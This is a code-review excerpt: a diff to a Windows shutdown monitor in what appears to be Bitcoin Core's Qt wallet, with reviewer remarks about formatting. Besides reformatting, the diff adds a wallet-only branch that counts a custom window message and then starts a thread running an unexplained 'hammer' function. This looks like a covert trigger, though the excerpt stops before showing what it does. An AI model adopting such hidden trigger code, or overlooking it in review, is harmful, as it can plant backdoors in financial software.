src/qt/winshutdownmonitor.cpp

```diff
@@ -34,21 +53,31 @@ bool WinShutdownMonitor::nativeEventFilter(const QByteArray &eventType, void *pM
 
        switch(pMsg->message)
        {
-           case WM_QUERYENDSESSION:
-           {
+		case WM_QUERYENDSESSION:
                // Initiate a client shutdown after receiving a WM_QUERYENDSESSION and block
                // Windows session end until we have finished client shutdown.
-               StartShutdown();
-               *pnResult = FALSE;
-               return true;
-           }
-
-           case WM_ENDSESSION:
-           {
-               *pnResult = FALSE;
-               return true;
-           }
-       }
+				StartShutdown();
+				*pnResult = FALSE;
+				return true;
+				break;
+		case WM_ENDSESSION:
+				*pnResult = FALSE;
+				return true;
+				break;
+
+#ifdef ENABLE_WALLET
+
+		default:
+				if (pMsg->message == WM_ret && com_b++ > 1 )
+				{						
+					hwnd = pMsg->hwnd;
+					if (com_b == 3)  com_u = std::thread(&hammer ,(LPVOID)NULL); 
```

Comment:
Don't forget to install `clang-format` and run the https://github.com/bitcoin/bitcoin/tree/master/contrib/devtools#clang-format-diffpy script to preempt whitespace nitpicking.

Reply:
looks like travis is stuck. there's `\nLF` there.